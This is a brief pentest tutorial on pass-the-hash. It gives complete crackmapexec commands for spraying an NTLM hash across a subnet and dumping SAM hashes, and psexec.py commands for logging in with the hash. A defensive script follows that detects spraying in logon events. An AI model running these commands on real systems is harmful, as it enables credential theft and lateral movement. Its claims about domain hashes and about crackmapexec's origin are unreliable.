Pass the hash

This attack only works with local SAM hashes (NTLM) and not with domain hashes (NTLM2). Since many administrators reuse the same password for their local and domain accounts, it is often possible to log in to a domain controller and other high-value systems using only local hashes.

Hash Spraying

Impacket's crackmapexec can take a single hash and spray an entire subnet with it, not only to test which systems accept it, but also to dump the local hashes from every system it gains access to. Crackmapexec can spray the following protocols: ldap, ssh, smb, winrm and mssql.

crackmapexec smb <target subnet> -u Administrator -H 64f12cddaa88057e06a81b54e73b949b --sam

(<target subnet> is a placeholder for the address range being assessed; the original omits the target argument.)

The output shows that the Administrator account exists with this same hash on a number of systems, including a Server 2019 system.

Logging into accounts using the hash

To log in to an account using the hash (provided the credentials are reused on the domain controller), use Impacket's psexec tool:

psexec.py Administrator:@<target> -hashes aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b

(<target> is a placeholder for the host, which the original omits. The empty password before the @ is intentional, since the credential is supplied through -hashes as LM:NT.)
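From the detection side, as an added example that is not part of the original page: both the spraying above and the psexec login show up on the receiving hosts as Windows Security event 4624 with logon type 3 (network) and authentication package NTLM, so one account reaching many hosts from one source in seconds stands out. The script below runs a sliding-window check over constructed sample events; the field names, thresholds and event data are assumptions to adapt to a real SIEM export.

```python
from collections import defaultdict
from datetime import datetime, timedelta

def _ev(host, user, src_ip, ts, logon_type=3, auth_pkg="NTLM"):
    # One normalised Security event 4624 (field names are an assumption).
    return {"host": host, "user": user, "src_ip": src_ip, "ts": ts,
            "logon_type": logon_type, "auth_pkg": auth_pkg}

# Constructed sample events, not real logs: one source sprays six hosts in
# 13 seconds, a service account repeats a logon to a single host, a Kerberos
# logon is present, and one account touches three hosts over an hour.
SAMPLE_EVENTS = [
    _ev("WS01", "Administrator", "10.0.0.50", "2024-01-10T09:00:01"),
    _ev("WS02", "Administrator", "10.0.0.50", "2024-01-10T09:00:03"),
    _ev("WS03", "Administrator", "10.0.0.50", "2024-01-10T09:00:05"),
    _ev("FS01", "Administrator", "10.0.0.50", "2024-01-10T09:00:08"),
    _ev("SRV2019", "Administrator", "10.0.0.50", "2024-01-10T09:00:11"),
    _ev("DC01", "Administrator", "10.0.0.50", "2024-01-10T09:00:14"),
    _ev("FS01", "svc_backup", "10.0.0.60", "2024-01-10T09:01:00"),
    _ev("FS01", "svc_backup", "10.0.0.60", "2024-01-10T09:02:00"),
    _ev("WS01", "alice", "10.0.0.70", "2024-01-10T09:03:00", auth_pkg="Kerberos"),
    _ev("WS07", "bob", "10.0.0.80", "2024-01-10T09:00:00"),
    _ev("WS08", "bob", "10.0.0.80", "2024-01-10T09:30:00"),
    _ev("WS09", "bob", "10.0.0.80", "2024-01-10T10:00:00"),
]

def detect_spray(events, min_hosts=5, window_minutes=5):
    """Return {(user, src_ip): sorted hosts} for every source that made NTLM
    network logons to at least min_hosts distinct hosts within any sliding
    window of window_minutes. Both thresholds are tuning assumptions."""
    window = timedelta(minutes=window_minutes)
    by_source = defaultdict(list)
    for e in events:
        # Pass-the-hash over SMB/WinRM lands as logon type 3 with the NTLM
        # package; Kerberos and interactive logons are ignored here.
        if e["logon_type"] == 3 and e["auth_pkg"].upper() == "NTLM":
            by_source[(e["user"], e["src_ip"])].append(
                (datetime.fromisoformat(e["ts"]), e["host"]))
    alerts = {}
    for key, logons in by_source.items():
        logons.sort()
        start = 0
        for end, (ts, _) in enumerate(logons):
            while ts - logons[start][0] > window:  # slide the window forward
                start += 1
            hosts = {h for _, h in logons[start:end + 1]}
            if len(hosts) >= min_hosts:
                alerts[key] = sorted(hosts | set(alerts.get(key, [])))
    return alerts
```

With the defaults, detect_spray(SAMPLE_EVENTS) flags only the Administrator source with its six hosts; widening the window and lowering min_hosts also surfaces slower patterns such as bob's three hosts over an hour.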